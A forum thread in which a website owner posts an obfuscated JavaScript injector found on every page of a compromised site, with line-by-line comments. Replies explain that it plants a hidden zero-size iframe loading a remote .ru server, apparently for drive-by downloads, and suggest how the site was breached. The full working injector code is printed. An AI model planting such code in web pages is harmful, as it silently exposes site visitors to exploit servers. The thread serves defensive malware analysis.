Found a dodgy script

One of my websites seems to have been compromised as I've found a script added on to all the index.html files and .js files on the server. I'm just wondering if anyone could tell me what it has been doing to my visitors?

try{
// MALWARE SAMPLE, annotated for analysis only -- do not run. This is the injector
// found appended to every index.html and .js on the compromised site.
// Net effect, worked out line by line below: once document.body exists, append a
// hidden (0x0) <iframe> whose src is http://chaoticice.ru:8080/index.php?... so
// every visitor's browser silently loads whatever that server serves.
var J3mbi4ltd;
function Pyyq9ov11b(){

// Poll until the body exists (the script is appended before/while the page
// parses); then stop the interval and fall through to inject exactly once.
if (typeof(document.body) == 'object'){
clearInterval(J3mbi4ltd);
}else{
return true;
}
// Everything assigned below is undeclared (no var) and so becomes a global.
Rep44jigd = '';
// Character-stripping obfuscation: removing the listed characters from each
// string yields 'height' and 'width', so this array is ['src','height','width']
// -- the attribute names that will be set on the injected element.
B7cl93owbrfi = ['src','h~e0i0gfhRtf'.replace(/[f~C0R]/g, ''), 'wLiEdEt!h!'.replace(/[\!EL\{J]/g, '')];
// Thin alias for element.setAttribute(name, value).
function Bl888ybmj(F4oyjug6eigg1,Wrf63p68pox7v,G5cufufhvjk){
return F4oyjug6eigg1.setAttribute(Wrf63p68pox7v,G5cufufhvjk);
}
// Thin alias for document.createElement(tagName).
function A511zkc(Fapg082uia){
return document.createElement(Fapg082uia);
}
// Tag to create: the stripped string decodes to 'iframe'. Only if the page
// already holds 20 or more frames does it fall back to an inert <p> (presumably
// a guard against re-injecting into pages it has already hit -- not confirmed).
Natxpwnvsr = 'p';
X0rkknejal = window.frames.length;
if (X0rkknejal<20) Natxpwnvsr = 'iEf:r/a+m/e:'.replace(/[\:\>E\+/]/g, '');
// Decoy values: assigned here and never read anywhere in the script.
A58okcuvi380 = 'GB';
Gsseqkv3wyv7 = '1544444201';
// Remote URL the iframe will load. The only page-derived data it carries is the
// frame count, appended as a second 'Xlzk1egit4zn1' query parameter.
Gpshvjo37oi = 'http://chaoticice.ru:8080/index.php?Xlzk1egit4zn1=1&pid=1&Xlzk1egit4zn1='+X0rkknejal;
// 1093499169 - 546749584.5*2 == 0 (subtraction happens a few lines down), so
// this is the value later used for both height and width: a 0x0, invisible frame.
H3plh7ewi5w = 1093499169;
// Container <div id="S3whhtlqt" name="S3whhtlqt"> appended to <body>; the
// iframe is placed inside it.
Xudx56rxyt4 = A511zkc('div');
Xudx56rxyt4.id = 'S3whhtlqt';
Xudx56rxyt4.name = 'S3whhtlqt';
H3plh7ewi5w -= 546749584.5*2;
document.body.appendChild(Xudx56rxyt4);
// Another decoy: a string holding a variable name, never used.
Bv18u7lzq = 'H3plh7ewi5w';
// Attribute values, paired positionally with ['src','height','width']: [url, 0, 0].
Vdqv0ucv = new Array(Gpshvjo37oi, H3plh7ewi5w,H3plh7ewi5w);
Ey3k2lj1 = document.createElement(Natxpwnvsr);
// for...in over the array indices: setAttribute('src', url), ('height', 0),
// ('width', 0) on the new iframe.
for (Lh82mv6xml in B7cl93owbrfi){
Bl888ybmj(Ey3k2lj1,B7cl93owbrfi[Lh82mv6xml], Vdqv0ucv[Lh82mv6xml]);
}
// Attach the hidden iframe; the browser fetches the remote URL at this point.
document.getElementById('S3whhtlqt').appendChild(Ey3k2lj1);
}

// Run the injector every 300 ms (interval given as a string; coerced to a
// number) until document.body is available.
J3mbi4ltd = window.setInterval(Pyyq9ov11b, '300');


// Any error thrown while setting up the interval is swallowed silently. Note
// this try/catch does NOT cover errors raised later inside the interval
// callback itself; those would surface in the browser console.
}catch(Q9stx2c4myphm){}
 
Looks like it's creating a hidden (0x0) iframe, dropping it into your page and loading content from a dodgy Russian site through it. The script itself only passes the page's frame count in the query string; what comes back is whatever that server decides to serve, and it won't be anything good!
 
Yeah, it's loading whatever is at the end of chaoticice.ru:8080/index.php in a hidden iframe. From there it can't read your visitors' cookies for your site (the iframe content runs in the remote origin, so same-origin policy blocks that); the usual purpose of this pattern is a drive-by download, i.e. serving browser/plugin exploits to whoever visits your page.
 
I'm seeing a lot of this going around in the last week. A few people I know have had their sites injected with crap taking visitors off to various Russian sites.

Incredibly annoying.
 
Are you by any chance running an old version of phpBB/phpNuke/other such badly made-yet-popular software? That's usually the most common attack vector. Since every index.html and .js on the server was modified, stolen FTP/hosting credentials are another common cause of this kind of mass injection — check the FTP/access logs for unfamiliar logins and change all passwords from a machine you trust.
 
There *was* a backup of a phpBB forum in a random folder, but it wasn't set up with a database so I'm not sure if that's still exploitable (its PHP files were still directly reachable on the web, which is what matters, database or not). Deleted it now anyway :)
 